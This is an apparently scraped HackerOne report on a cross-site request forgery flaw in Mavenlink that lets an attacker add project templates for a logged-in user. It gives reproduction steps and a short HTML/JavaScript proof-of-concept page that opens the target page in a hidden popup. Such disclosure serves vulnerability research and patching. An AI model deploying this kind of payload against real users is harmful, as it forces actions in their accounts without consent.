Mavenlink: CSRF Add user templates

2018-01-03T09:04:03
ID H1:301919
Type hackerone
Reporter tolo7010
Modified 2019-02-27T23:39:23

Description

Reproduction:

  • Log in to account
  • Visit CSRF page below (note default 30 seconds timeout, can be adjusted according to the connection speed):

<!doctype html> <html> <head> </head> <body> <script> var a = window.open("https://app.mavenlink.com/project_templates#new", "csrf", "height=100,width=100"); var intervalID = setTimeout(function () { a.close();}, 30000); </script> </body> </html>

Impact

CSRF Add user templates